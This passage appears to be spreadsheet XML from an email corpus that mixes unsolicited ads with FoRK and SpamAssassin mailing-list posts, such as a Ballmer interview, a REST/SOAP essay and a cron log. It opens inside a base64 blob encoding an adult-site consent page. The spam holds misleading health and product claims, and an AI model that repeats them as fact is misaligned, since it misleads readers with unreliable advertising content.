 ZSB0aGUgYWdlIGxpbWl0IGFuZCBkbyBub3QgZmluZCB0aGlzIG1hdGVyaWFs
 IG9mZmVuc2l2ZS4gWW91IHdpbGwgYWxzbw0Kbm90IGhvbGQgdXMgbGlhYmxl
 IGZvciBhbnkgZGFtYWdlcyBvciBwZXJzb25hbCBkaXNjb21mb3J0LiZuYnNw
 OzwvTEk+DQoNCjxMST4NCkkgYW0gYW4gYWR1bHQgb3ZlciB0aGUgYWdlIG9m
 IDE4IHllYXJzIChvciAyMSB5ZWFycyBkZXBlbmRpbmcgb24gbG9jYWwNCmdv
 dmVybmluZyBsYXdzIHJlbGF0aW5nIHRvIGV4cGxpY2l0IHNleHVhbCBtYXRl
 cmlhbCkuPC9MST4NCg0KPExJPg0KSSB3aWxsIG5vdCBhbGxvdyBhbnlvbmUg
 dW5kZXIgdGhlIGxlZ2FsIGFnZSB3aGljaCBpcyBkZXRlcm1pbmVkIGFzIGFi
 b3ZlDQp0byBoYXZlIGFjY2VzcyB0byBhbnkgb2YgdGhlIG1hdGVyaWFscyBj
 b250YWluZWQgd2l0aGluIHRoaXMgc2l0ZS48L0xJPg0KDQo8TEk+DQpJIGFt
 IHZvbHVudGFyaWx5IGNvbnRpbnVpbmcgb24gd2l0aCB0aGlzIHNpdGUsIEkg
 dW5kZXJzdGFuZCBJIHdpbGwgYmUgZXhwb3NlZA0KdG8gc2V4dWFsbHkgZXhw
 bGljaXQgbWF0ZXJpYWwgaW5jbHVkaW5nIHBpY3R1cmVzLCBzdG9yaWVzICwg
 dmlkZW9zIGFuZA0KZ3JhcGhpY3MuPC9MST4NCg0KPExJPg0KSSB3aWxsIG5v
 dCBob2xkIHlvdSByZXNwb25zaWJsZSBmb3IgYW55IGRhbWFnZXMgb3Igdmlv
 bGF0aW9ucyB0aGF0IHlvdQ0KbWF5IGhhdmUgY2F1c2VkLjwvTEk+DQo8L1VM
 Pg0KDQo8Q0VOVEVSPg0KPFA+PEJSPjxCPjxGT05UIFNJWkU9Nz48QSBIUkVG
 PSJodHRwOi8vd3d3LnBhZ2U0bGlmZS5vcmcvdXNlcnMveHh4ZGF0aW5nL21h
 cnJpZWRhbmRsb25lbHkvcHJldmlldy5odG0iPkVOVEVSDQpTSVRFPC9BPjwv
 Rk9OVD48L0I+PC9DRU5URVI+DQo8L1REPg0KPC9UUj4NCjwvVEFCTEU+PC9D
 RU5URVI+DQoNCjxQIEFMSUdOPSJjZW50ZXIiPiZuYnNwOzwvUD4NCg0KPC9C
 T0RZPg0KPC9IVE1MPg0KODIxNmpSRVg5LTc4NXZGako1N2wxOA==
</t>
  </si>
  <si>
    <t xml:space="preserve">1) Fight The Risk of Cancer!
 http://www.adclick.ws/p.cfm?o=315&amp;s=pk007
 2) Slim Down - Guaranteed to lose 10-12 lbs in 30 days
 http://www.adclick.ws/p.cfm?o=249&amp;s=pk007
 3) Get the Child Support You Deserve - Free Legal Advice
 http://www.adclick.ws/p.cfm?o=245&amp;s=pk002
 4) Join the Web's Fastest Growing Singles Community
 http://www.adclick.ws/p.cfm?o=259&amp;s=pk007
 5) Start Your Private Photo Album Online!
 http://www.adclick.ws/p.cfm?o=283&amp;s=pk007
 Have a Wonderful Day,
 Offer Manager
 PrizeMama
 If you wish to leave this list please use the link below.
 http://www.qves.com/trim/?zzzz@example.com%7C17%7C308417
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: YOUR POWER SUPPLY IS KILLING YOUR ELECTRICAL EQUIPMENT
</t>
  </si>
  <si>
    <t xml:space="preserve">Did you know that???
 Fact:	Every electrical system suffers from power surges?
 Fact:	80% of electrical equipment damage is caused by surges - also known
 as 'spikes'.  These spikes can damage sensitive electronics in computers
 to heavy industrial motors.
 Fact:	These spikes or surges hit your electrical circuits up to 400,000
 times per hour.  Your electrical equipment is being gradually and
 sometimes suddenly destroyed.
 Fact:	OUR RANGE OF SURGE ARRESTORS will reduce your operating costs
 dramatically by extending the life of all your electrical and electronic
 equipment.
 Motors run cooler, your fluorescent lighting life is doubled.  Your
 equipment works more efficiently and your energy costs fall.
 Fact:	THE SAVINGS you make in electrical consumption, electrical repairs,
 electronic repair, telephone and data systems protection and lighting 
 replacements can cover the cost of installing our surge and lightning
 arrestors.
 Even more importantly no sudden, dramatic system failure caused by
 	lightning, surges and spikes.
 Now you know!!
 Don't let your power supply kill your business!
 Email me for more information. I look forward to hearing from you.
 My very best to you.
 Ray Butler  
 Email: apec-tech@totalise.co.uk
 P.S.	Don't underestimate the high level of risk and costs you're your
 business is suffering from in replacement costs, down time and customer
 dissatisfaction.
 APEC-TECH.COM
 The Frieslawn Centre, Hodsoll Street, Sevenoaks, Kent. TN15 7 LH United
 Kingdom
 Tel UK: 01732 824401      Fax UK: 01732 824455 
 Email Office:  apec-tech@totalise.co.uk 
 To be removed from our mailing list please reply with the word REMOVE in
 the subject line and please accept our apologies for troubling you.
</t>
  </si>
  <si>
    <t xml:space="preserve">
 It was the best of times, it was the worst of times,
 it was the age of wisdom, it was the age of foolishness,
 it was the epoch of belief, it was the epoch of incredulity,
 it was the season of Light, it was the season of Darkness,
 it was the spring of hope, it was the winter of despair,
 we had everything before us, we had nothing before us,
 we were all going direct to Heaven, we were all going direct the other way
 ---C Dickens
 G'Quon Wrote "There is a greater darkness than the one we fight. It is the
 darkness of  the soul that has lost its way." The war we fight is not
 against powers  and principalities - it is against chaos and despair.
 Greater than the  death of flesh is the death of hope, the death of
 dreams. Against this  peril we can never surrender. The future is all
 around us, waiting in  moments of transition, to be born in moments of
 revelation. No one knows  the shape of that future, or where it will take
 us. We know only that it  is always born in pain.
 --JWS
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Infoworld] Ballmer describes what a Chief Software Architect does
</t>
  </si>
  <si>
    <t xml:space="preserve">Rohit was wondering what Microsoft's definition of a Chief Software
 Architect is (and, consequently, what Microsoft thinks is a roadmap).
 Here you go, from Mr. Ballmer to Mr. Gillmor to Mr. FoRK...
 Architecture is war; love 'em or hate 'em, at least Microsoft
 understands that: as Chief SA, BillG oversees all product strategy.
 "There are two things a road map can be. One is just a piece of paper
 that tells what everyone is doing and records a bunch of bottom-up
 plans. Or it can be something where we impose more broadly our vision
 from the top. We are not going to try to get everything shared. ...
 That's a path for getting everything stopped up. But at the same time we
 are trying to take the top four or five things we are trying to do in
 the Longhorn wave, Yukon wave, or the .Net wave and really have enough
 time to have some cross-cutting discussions about how we make that happen."
 "Bill [Gates] is dedicated full-time to being chief software
 architect. He also happens to be chairman of the company, but he spends
 most of his time being chief software architect. We have a body now that
 meets every month -- the SLTT [Senior Leadership Technical Team],
 basically the top people involved in the product-creating strategy --
 and we present and discuss the issues. Bill is driving a process for
 each of these waves. For instance, [he will ask] what are the
 cross-cutting scenarios that I want, and then [he will] get all the
 right product groups together and bring these things in front of the SLTT."
 "People talk about what it takes to be a good manager, and people talk
 about being a good coach and getting people to like you. In a large
 organization those things are important, but at a certain level, ... the
 most important thing you can do for your people to make them better is
 to give them a framework where they can work in harmony with the other
 people in the company. And from Bill's perspective, [this framework] is
 the technical road map and the SLTT process; it is the scenarios. From
 my perspective, it is the P&amp;L [profit and loss] structure and the
 multiple businesses because, given how we work, giving people a
 framework that gets them to make the whole bigger than the sum of the
 parts will mean we have better offerings."
 http://www.infoworld.com/articles/pl/xml/02/07/22/020722plballmer.xml
 Ballmer in charge 
 July 18, 2002 1:01 pm PT
 NO ONE KNOWS better than Microsoft CEO Steve Ballmer that, as the .Net
 platform evolves, the success of Microsoft depends on how well the
 company coordinates its tool, server, and client strategies and how well
 it communicates that vision. In an interview with InfoWorld Test Center
 Director Steve Gillmor and InfoWorld Editor at Large Ed Scannell at
 Microsoft Fusion 2002, Ballmer discussed the progress of .Net, changes
 in the company's approach to product development, and Microsoft's
 efforts to simplify product licensing and inspire trust in customers and
 partners.
 &gt; Last time we talked was two years ago, at the beginning of the .Net
 &gt; era. So where are we now in the .Net evolution?
 Let me start by talking about where I think we are in the XML revolution
 first, and then [I will] talk about where we are with .Net. I believe
 that the IT industry collectively decided over the last three or four
 years that the world was going to be replatformed with XML as the key
 foundation. It's not like anyone ever got together to decide this, but
 it's like magnetic north, where it's been clearly indicated that
 everyone is rallying around the concept. But I think the degree to which
 [XML] is pervasive might still be underestimated. A lot of partners,
 even at this conference, see it as b-to-b for big companies. But it is
 really about the way software in general is designed. It is all about
 the way security should work. Management -- everything is changed.
 So to answer your direct question, two years ago I might have said the
 jury is still out about whether [XML] was going to happen. We were
 questioning if it was going to be a legitimate competitor to Java. But
 now the world has decided to embrace [XML] as the basis for the next
 generation of technology. And there are a lot of benefits that come with
 it. Could it have been something other than XML? Sure it could have. It
 wasn't the specific technical implementation; it is merely the fact that
 it comes out of Internet standards. It has deeper semantic abilities. It
 is all about interoperability and connection.
 So in that context, where are we with .Net? I'll say a couple
 things. No. 1, I would say we have some momentum in the market. We have
 customers using the .Net product line, like Merrill [Lynch], Credit
 Suisse, Marks &amp; Spencer, CitiBank, and a variety of others. People who
 are doing some things for real. I feel like the degree we are out front
 is in some ways smaller and in some ways larger.
 &gt; How so?
 Smaller in the sense that everyone is talking the XML talk, even Sun;
 bigger in the execution sense: We've delivered. We delivered the first
 batch of products that really were built XML to the core -- Visual
 Studio .Net and BizTalk Server -- and we are getting traction. So I feel
 good about where our execution is relative to everyone else. That is not
 to say that other people aren't doing some reasonable bolt-on XML
 support for the stuff they have.
 &gt; You have some heavy lifting to do to convince your customers and
 &gt; partners to follow along. What do you have to do to set the standard
 &gt; for adoption and upgrading to this next generation?
 We have to present the picture that we are behaving consistently within
 the framework of focusing on customer issues and customer satisfaction
 and trustworthy computing, which we have articulated. Now there are some
 things I would have done differently, in 20-20 hindsight. I would have
 increased the focus on not just security but deployment, because a lot
 of the security problems are actually deployment problems. We have the
 fix, but sometimes we can't get the tools in their hands to deploy those
 fixes fast enough. Licensing -- I know I would have given more time, and
 there are better ways to plan around the kinds of changes we made. We
 are still going to have to get smart about the full ramifications.
 &gt; Do you expect any changes to be made between now and July 31 to
 &gt; Licensing 6.0? There is a lot of push-back on this.
 No, there is nothing that will happen between now and July 31. And we
 will continue to learn over time what we need to do to earn our
 customers' trust and earn their business. I think many of the people who
 are pushing back really don't even know the new terms.
 &gt; Isn't that your fault for not educating them?
 Yes, it is our fault. But you meet with plenty of customers whose
 companies already have licenses, and they are saying, 'I think there's a
 problem.' I don't deny there are some problems. I am sure there are some
 issues we will have to work on over time.
 After July 31 we are going to see what the real issues are. I was
 talking to a customer at the show who was saying he thought there would
 be a problem, and I told him that we just completed a deal with his
 company and that he is now universally licensed and that total costs to
 his company are now lower than they were before. And he said, 'Oh really?'
 So we'll go through July 31. We have a lot of customers who have signed
 licenses, and I am sure we are going to find some issues. My bigger
 concerns today are probably not in the larger accounts, but there may be
 some issues we need to address among the smaller-size companies, and we will.
 &gt; How does the .Net initiative change the way in-house client and server
 &gt; developers work together? 
 What we are trying to do for the health of .Net and the health of the
 company and the sanity of the people who work there and the quality of
 the products we produce is to have a more orchestrated, ber-road map
 of where we are going.
 Now there are two things a road map can be. One is just a piece of paper
 that tells what everyone is doing and records a bunch of bottom-up
 plans. Or it can be something where we impose more broadly our vision
 from the top. We are not going to try to get everything shared. ...
 That's a path for getting everything stopped up. But at the same time we
 are trying to take the top four or five things we are trying to do in
 the Longhorn wave, Yukon wave, or the .Net wave and really have enough
 time to have some cross-cutting discussions about how we make that happen.
 Bill [Gates] is dedicated full-time to being chief software
 architect. He also happens to be chairman of the company, but he spends
 most of his time being chief software architect. We have a body now that
 meets every month -- the SLTT [Senior Leadership Technical Team],
 basically the top people involved in the product-creating strategy --
 and we present and discuss the issues. Bill is driving a process for
 each of these waves. For instance, [he will ask] what are the
 cross-cutting scenarios that I want, and then [he will] get all the
 right product groups together and bring these things in front of the SLTT.
 People talk about what it takes to be a good manager, and people talk
 about being a good coach and getting people to like you. In a large
 organization those things are important, but at a certain level, ... the
 most important thing you can do for your people to make them better is
 to give them a framework where they can work in harmony with the other
 people in the company. And from Bill's perspective, [this framework] is
 the technical road map and the SLTT process; it is the scenarios. From
 my perspective, it is the P&amp;L [profit and loss] structure and the
 multiple businesses because, given how we work, giving people a
 framework that gets them to make the whole bigger than the sum of the
 parts will mean we have better offerings.
 &gt; It seems the scenarios construct is really working for you. Is this an
 &gt; evolution of the solutions approach? 
 I would say it is a pretty direct extrapolation from the solutions
 stuff, only I think we are just getting a little more experience. I
 think we use the word scenarios more often and solutions less, because
 solution sounds more like a fixed thing. At the end of the day, most of
 the things we do are customizable and programmable, and so people make
 them into the solution they want. But they are still scenarios. What
 will software deployment look like? Well, that is a scenario because it
 involves Windows, Office, and other applications.
 We are working hard to make sure the whole is bigger than the sum of the
 parts. That's not to say people are always comfortable with this. I
 can't even say we will do it perfectly. All we have to do is do it a lot
 better than we had been doing it. I think that would be a big step
 forward for the customers.
 &gt; Will this approach cut down on some of the technology civil wars
 &gt; Microsoft has had in the past involving who is going to gain control of
 &gt; a project? This seems to be a very democratic approach to development.
 I would not use the word democracy to describe it. People have to come
 together and ultimately make some decisions. This is not a voting
 process here, the agenda of what we think is important. We get a lot of
 input. [But] once it is decided, people don't get to vote with their feet.
 We try to make a quantum leap here in terms of our ability to improve
 pulling together all the pieces. Our customers want us to do
 that. Simplifying concepts by unifying them. The customers don't say
 they want us to do that, but when we do do that, they go, 'Ahhh, I get
 it. That makes sense.'
 I don't want to go to six more meetings where people say, 'Is your
 workflow strategy BizTalk?' ... Or 'What's your Office workflow
 strategy?' Or 'Why is synchronization in some ways better for e-mail and
 Outlook than it is for file folders and Web pages?'
 To get that sort of synchronization sometimes -- to get that high-level
 road map to work -- you have to build something we don't have today. So
 we have been talking about unifying storage. And so the best way to get
 all this stuff to work is to get them all to work just one way. Then you
 just keep tuning one set of parameters instead of having a thousand
 flowers blooming.
 &gt; In your Fusion keynote today, you talked about who your competitors
 &gt; are, and it was the usual suspects. But one you didn't mention is
 &gt; yourself. You are competing against the last generation of your technology.
 Always. Given that our stuff doesn't wear out or break down -- you can
 question whether it breaks or not [Ballmer grins] -- but it doesn't
 break down like machinery does. To get anyone to do something new, we
 have to have something interesting and innovative.
 People think, OK, should we just do more upgrades or try to sell more
 new product? We decided that users like us to do a level of systems
 integration so they don't have to get involved in that. So take
 Sharepoint Team Services, which we put in Office. We could have sold
 Team Services as a separate product, and we could have introduced a new
 SKU [stock keeping unit]. We could have decided if it should work down
 level with the old Office or just the new version of Office, and we
 could do that with real-time communications. But we tend to like to put
 things together, integrate them, and then release batches?1202?-- which
 are then 'upgrades' -- as a form of introducing our new innovation. But
 no matter how you do it, because our stuff does not wear out, we have to
 convince people that some idea we have is better or more powerful than
 the older idea we had.
 And there are two aspects of doing that. One aspect is, on a given
 product or upgrade release, does that make sense? Or do we convince you
 that over an nyear period of time we will have enough innovation that
 you will want to be licensed for that innovation. And this is part of
 this whole licensing discussion we are having.
 We moved to the new licensing for two reasons, I would say. No. 1, we
 wanted to simplify our licensing. When we look back a year from now, I
 guarantee you that where we are now is simpler than where we
 were. Nothing is simpler during a transition because they are learning
 the new and are more familiar with the old, but I think people will
 eventually realize this is simpler. Our licensing got pretty complicated
 over the years, and some people came to not understand it all.
 The other issue is [the timing of delivering] our innovation. I don't
 want to have a lot of rough questions [from customers]. So when we do
 have new ideas, it's like, OK, should we put it in this upgrade or that
 one or just have a stream of stuff that only our best customers have
 access to under the terms of their contract? I think in the long run we
 have a better chance of satisfying them with the latter than with
 hitting them with six different upgrades. I am a fan of [letting] the
 customer decide, OK, I want that piece or this piece. But they are
 licensed for all of it. So those are the two things we sought to do.
 &gt; That gets back to the trust issue, where if you front-load it, that's
 &gt; the big, lumpy upgrade; and if you back-load it with the vision, the
 &gt; .Net 2003 servers, you have a long gap in the middle where you have to
 &gt; sell into an untrusting audience.
 The truth is, we need to be better at both. There are some things you
 can only do big and lumpy, like a new file system. It's not like some
 sort of small user feature; if you change the file system, then the
 storage, the backup, probaby those things are going to change. Probably
 the shell ought to change.The applications ... a lot of things are going
 to change. Can you call that lumpy? Or you can put out four new features
 in PowerPoint, sure -- that would not look lumpy to users.
 I think we have to build trust in the model, and we are going to have to
 deliver more over time. It will not come overnight. People will have to
 see that we do a few things, ... that not all of our innovation is
 lumpy, that more of it comes evenly and steadily. People develop a
 confidence and faith; they like both aspects of the model. Over time,
 our support needs to become more intimately involved in that story.
 We know that, but we don't know exactly what that means yet. And this
 whole notion of software as a service -- this is not a licensing or
 business discussion. It's how does software get rearchitected in the
 world of the Internet? I mean, how many software products are
 fundamentally different because of the Internet? Not many. Probably the
 anti-virus guys keep up the best. They are always feeding new virus
 support in. I asked the audience [at Fusion] how many use Windows
 Update. Now that's a small piece of software, but it is big. That's the
 consumer market; we've got to get that to really purr in the corporate market.
 &gt; The lack of broadband build-out and adoption seems to be holding up
 &gt; the ability for users to take advantage of some new services you're
 &gt; talking about. When Bill [Gates] invested in Comcast cable, it
 &gt; triggered the Baby Bells to get on board with DSL. What are you doing
 &gt; now to deal with that issue?
 The No. 1 thing is, we have to make software that is so compelling that
 people will start saying, 'Well, of course I am going to get broadband.'
 &gt; And 802.11 is one of those compelling features?
 Yes, it is. I was in a hotel in Sun Valley, [Utah], this week that was
 not wired. So I turned on my PC, and XP tells me there is a wireless
 network available. So I connect to something called Mountaineer. Well, I
 don't know what that is. But I have a VPN into Microsoft; it worked. I
 don't know whose broadband I used. I didn't see it in Bill's room. I
 called him up and said, 'Hey, come over to my room.' So soon everyone is
 there and connecting to the Internet through my room.
 We have to support all the modalities, whether it is GPRS [General
 Packet Radio Service] or 802.11. We have to make it easy to provision
 from a software perspective for things that go on with DSL [and] cable
 modems. ... And the software has to want a broadband link. There are not
 many things you do where you say I really care about the performance. If
 I am downloading PowerPoint files, then I want broadband. So when you
 can do things with speed that you otherwise can't do without speed, that
 is going to put a lot of pressure on the broadband community.
 That's the weird answer. The more normal answer is, yeah, isn't it
 awful: There is not enough broadband, and the prices they charge ... . I
 agree with all that. If you look at what happened in Japan recently,
 there was a big drop -- it is now $25 a month for DSL. Vroom. They have
 gone from almost no DSL connections a year ago to 1.5 [million] or 1.8
 million [subscribers].
 &gt; So how do we make that happen in this country?
 I think that is beyond us. If there is enough interest where the
 consumers are looking intensely for broadband, whether it is at today's
 prices or tomorrow's prices, that is going to shake out the
 marketplace. And I think the marketplace will do a good job. We just
 have to make it something obvious that consumers want. Now I happen to
 live in a neigborhood where there is no broadband network. No DSL or
 cable modems. Well, I have a neighbor, [Teledesic chairman and co-CEO]
 Craig McCaw, who has a wireless network that I think I can piggyback off
 of [Ballmer laughs]. So, yes, broadband is a bottleneck -- but I also
 think we have to look at oursleves as a software industry and say,
 'Aren't we, too, some of that bottleneck?' We have not built software
 that makes broadband a must-have.
 &gt; Microsoft CEO weighs in
 &gt; 
 &gt; Ballmer addresses a number of key issues for customers and partners.
 &gt; 
 &gt; On security and trust: "There are some things I would have done
 &gt; differently."
 &gt; 
 &gt; On coordinating product groups: "We are working hard to make sure
 &gt; the whole is bigger than the sum of the parts."  
 &gt;
 &gt; On product licensing: "We are still going to have to get smart
 &gt; about the full ramifications." 
 ----
 aDaM@XeNT.CoM -- long .sig alert!
 I believe it is quite possible to productively apply both supposedly
 incompatible approaches [REST &amp; SOAP] together.  I'll sketch it out
 below, both in prescriptive form.  Note: while this is proscriptive, it
 is expected that local adaptations will be provided.
 1. Start by modeling the persistent resources that you wish to expose.
 By persistent resources, I am referring to entities that have a typical
 life expectancy of days or greater.  Ensure that each instance has a
 unique URL.  When possible, assign meaningful names to resources.
 2. Whenever possible, provide a default XML representation for each
 representation.  Unlike traditional object oriented programming
 languages where there is a unique getter per property, typically there
 will be a single representation of the entire instance.  These
 representations will often contain XLinks (a.k.a. pointers or
 references) to other instances.
 3. Now add high level methods which take care of all composite create,
 update, and delete operations.  A key aspect of the design is that
 messages for these operations need to be self contained - both the
 sender and receiver should be able to make the absolute minimum of
 assumptions as to the other's state, and multiple requests should not be
 required to implement a single logical operation.  All requests should
 provide the appearance of being executed atomically.
 4. Query operations deserve special consideration.  A general purpose
 XML syntax should be provided in every case.  In addition, when a
 reasonable expectation exists that query parameters will be of a
 relatively short size and not require significant encoding, then a HTTP
 GET with the parameters encoded as a query string should also be
 provided.
 Implications  
 The following table emphasizes how this unified approach differs from
 the "pure" (albeit hypothetical) different positions described above.
 1. Resource -- POST operations explicitly have the possibility of
 modifying multiple resources.  PUT and DELETE operations are rarely
 used, if ever.  GETs may contain query arguments.
 2. Get -- GETs must never be used for operations which observably change
 the state of the recipient.  POST should be used instead.
 3. Message -- Do not presume that URLs are static, instead presume that
 they identify the resource.  In particular, recognize that URLs can be
 dynamically generated.  Expect URLs of other SOAP Resources in
 responses.  Use the SOAP Response MEP for pure retrieval operations.
 4. Procedure -- Treat the URL itself as the implicit first parameter.
 Allow URLs to be dynamically generated, and returned in structures.  Use
 HTTP GET for retrieval operations.
 Conclusions  
 Looking to the future, the application level inter-networking protocols
 that emerge today will likely be the application level intra-networking
 protocols of the next decade.  Both REST and SOAP contain features that
 the others lack.  Most significantly:
 REST - SOAP = XLink
 The key bit of functionality that SOAP applications miss today is the
 ability to link together resources.  SOAP 1.2 makes significant progress
 in addressing this.  Hopefully WSDL 1.2 will complete this important work.
 SOAP - REST = Stored Procedures
 Looking at how other large scale systems cope with updates provides some
 key insights into productive areas for future research with respect to REST.
 Finally, it bears repeating.  Just because a service is using HTTP GET,
 doesn't mean that it is REST.  If you are encoding parameters on the
 URL, you are probably making an RPC request of a service, not retrieving
 the representation of a resource.  It is worth reading Roy Fielding's
 &lt;http://lists.w3.org/Archives/Public/www-tag/2002Apr/0181.html&gt; thoughts
 on the subject.  The only exception to this rule that is routinely
 condoned within the REST crowd is queries.
   -- Sam Ruby, http://radio.weblogs.com/0101679/stories/2002/07/20/restSoap.html
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">SF Weekly:
 &gt;Nothing's more enticing than an evening cruise around San Francisco Bay, 
 &gt;and the islands, bridges, and lights of the city are especially entrancing 
 &gt;viewed from this vintage brigantine schooner. Built in 1933 and recently 
 &gt;restored to its former glory, the 78-foot Rendezvous looks like a clipper 
 &gt;ship out of the Gold Rush era, with its 80-foot masts and square-rigged 
 &gt;sails.
 That sounds like fun. But it sets the wrong precedent.
 Here's the better idea. Invite her for an afternoon
 cruise under the Golden Gate bridge in your Stonehorse
 day sailor. Under way, ask her if she'd like to take
 the stick. Back at slip, cook her dinner. Something
 simple, but good, maybe a stir fry or a stew, served
 in the cockpit, with an inexpensive but potable wine.
 If she runs away after that, 'tis good riddance. If
 she wants to try it again, another day, she shows
 promise. If she asks you to show her the V berth, you
 have a girlfriend. If she notes your brightwork needs
 another coat, and asks what you're using on it,
 propose on the spot.
 ;-)
 _________________________________________________________________
 MSN Photos is the easiest way to share and print your photos: 
 http://photos.msn.com/support/worldwide.aspx
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: IWT Bans RIAA From Accessing Its Network
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.informationwave.net/news/20020819riaa.php
   IWT Bans RIAA From Accessing Its Network
 August 19, 2002
 Information Wave Technologies has announced it will actively deny the
 Recording Industry Association of America (RIAA) from accessing the
 contents of its network. Earlier this year, the RIAA announced its new plan
 to access computers without owner's consent for the sake of protecting its
 assets. Information Wave believes this policy puts its customers at risk of
 unintentional damage, corporate espionage, and invasion of privacy to say
 the least.
 Due to the nature of this matter and RIAA's previous history, we feel the
 RIAA will abuse software vulnerabilities in a client's browser after the
 browser accesses its site, potentially allowing the RIAA to access and/or
 tamper with your data. Starting at midnight on August 19, 2002, Information
 Wave customers will no longer be able to reach the RIAA's web site.
 Information Wave will also actively seek out attempts by the RIAA to thwart
 this policy and apply additional filters to protect our customers' data.
 Information Wave will also deploy peer-to-peer clients on the Gnutella
 network from its security research and development network (honeynet) which
 will offer files with popular song titles derived from the Billboard Top
 100 maintained by VNU eMedia. No copyright violations will take place,
 these files will merely have arbitrary sizes similar to the length of a 3
 to 4 minute MP3 audio file encoded at 128kbps. Clients which connect to our
 peer-to-peer clients, and then afterwards attempt to illegally access the
 network will be immediately blacklisted from Information Wave's network.
 The data collected will be actively maintained and distributed from our
 network operations site.
 The placement of this policy is not intended to hamper the RIAA's piracy
 elimination agenda or advocate Internet piracy, but to ensure the safety of
 our customers' data attached to our network from hackers or corporate
 espionage hidden by the veil of RIAA copyright enforcement.
 If you have questions, comments, or concerns regarding this policy, please
 e-mail riaa@informationwave.net.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</si>
  <si>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Subject: Cron &lt;yyyy@dogma&gt; /home/yyyy/logs/runme
</t>
  </si>
  <si>
    <t xml:space="preserve">/etc/rc.d/init.d/httpd: kill: (21982) - No such pid
 /etc/rc.d/init.d/httpd: kill: (21981) - No such pid
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: DBS Recommendations?
</t>
  </si>
  <si>
    <t xml:space="preserve">It doesn't really matter since they're about to merge. If you're into
 PVRs though, Dish just came out with the "721" receiver. No monthly
 fee for it (unlike Tivo, etc) and it can record two things at once while
 you watch a third program previously recorded. Also has 120GB hard drive
 and rumor has it a Broadcom chip in there to support the new encoding
 system expected to be put into place a couple years after the merger.
 (oh and the 721 is based on Linux if that matters)
 Bill Humphries wrote:
 &gt; 
 &gt; I told AT&amp;T to get lost after they wanted $$$ to change my service address.
 &gt; 
 &gt; RCN doesn't service Mountain View, so I'm looking at Dish Network and
 &gt; Direct TV.
 &gt; 
 &gt; So far Direct TV appears to be the better deal.
 &gt; 
 &gt; Recommendations? Horror stories? Alternatives I've missed?
 &gt; 
 &gt; -- whump
 &gt; 
 &gt; http://xent.com/mailman/listinfo/fork
 -- 
 Brian Atkins
 Singularity Institute for Artificial Intelligence
 http://www.singinst.org/
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: 7000 or bust?:)-
</t>
  </si>
  <si>
    <t xml:space="preserve">
 So whats the eariliest  for hitting 7k?
 http://money.cnn.com/2002/07/19/markets/markets_newyork/index.htm
 "According to preliminary reports, the Dow fell 390.23 to 8,019.26, to its
 lowest level since January 1998. The Nasdaq composite index lost 37.94 to
 1,319.01. The Standard &amp; Poor's 500 index lost 34.03 to 847.53.
 The index has fallen more than 1,000 points in the past two weeks and
 closed down nine of the last 10 sessions. Both the Nasdaq and S&amp;P are near
 their lowest levels since the first half of 1997.
 "
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ADV: RATES HAVE DROPPED -- FREE MORTGAGE RATE QUOTE nttvo
</t>
  </si>
  <si>
    <t xml:space="preserve">
 *** Compliance: see notice at bottom of mail
 ************************************************
 Are you wasting money EVERY SINGLE MONTH?
 Home Mortgage Rates have DROPPED!
 Simply fill out our FREE NO OBLIGATION form and find out how much you can save.
 It's That Easy!
 Visit our website:
 http://www.deal-makerz.com/
       ================================================
 Compliance Notice: This mail is sent in compliance with
 all State and Federal laws.
 You are receiving this mail because your address was in a list of
 previous business contacts, or on a purchased list of opt-in,
 previous business contacts, or general internet addresses.
 Our most important list is our list of addresses who have 
 expressed their desire to be removed from future mailings.
 All remove requests are automatically processed within 72 hours.
 Once your address is processed, you will NEVER
 receive marketing mail at that address from us again.
 To be removed, click below, and send:
 mailto:response@media-central.net?subject=remove
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAdev] RESENT_TO, argh
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Theo Van Dinter said:
 &gt; Well, I have my users bounce me their spams (which means there's 2
 &gt; users who do it), and I wrote this procmail bit just for the reason
 &gt; you mentioned:
 urgh.  I guess fixing the spamtraps to strip the headers before
 writing them is the best thing to do...
 --j.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Just Ask the Experts
</t>
  </si>
  <si>
    <t xml:space="preserve">R. A. Hettinga wrote:
 &gt;A little tidbit for those who still believe in science by opinion poll...
 &gt;
 &gt;Cheers,
 &gt;RAH
 &gt;  
 &gt;
 Was there any science in there? All I saw was more of the "myth of the 
 liberal media." Every opinion supporting global warming was "the media", 
 every opinion against it was an "expert." A brief perusal of the rest of 
 the web site and I'm left wondering where the science
 is.
 And, to put on my extremist hat, every organization or scientist in 
 there was American. Big deal - a bunch of scientists being trotted out 
 to support government and industrial policy that is the ultimate source 
 of their livelihood and research money. If the government changes their 
 mind on Kyoto, they'll trot out another group of tame scientists. And 
 all the American papers will switch back to warning us about climate change.
 Owen
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: apt repository for irssi
</t>
  </si>
  <si>
    <t xml:space="preserve">Seems like irssi.org also has an apt-rpm repository for snapshots of irssi:
 rpm http://ninja.no/apt 7.3/i386 irssi
 rpm-src http://ninja.no/apt 7.3/i386 irssi
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: San Francisco caffeine tour
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85481649
 Date: Not supplied
 Javawalk is a coffee-oriented walking-tour of San Francisco. 
     Javawalk is a two-hour walk in the city center. We start at Union Square 
     and wind through Chinatown, Jackson Square and North Beach, the city's 
     Italian district. While we cover the city's coffee roots (much more 
     significant than Seattle's!) and coffeehouse culture (think beatnik), we 
     also spend some time on San Francisco's history, interesting and arcane 
     trivia and stories the Javagirl has collected from many years of living in 
     the city. Truly, some things could only happen in SF! Javawalk also makes a 
     couple of stops at North Beach cafes for a quick java jolt. Since cool 
     weather prevails here, we need coffee year-round in the city by the Bay. 
     Lucky us!  
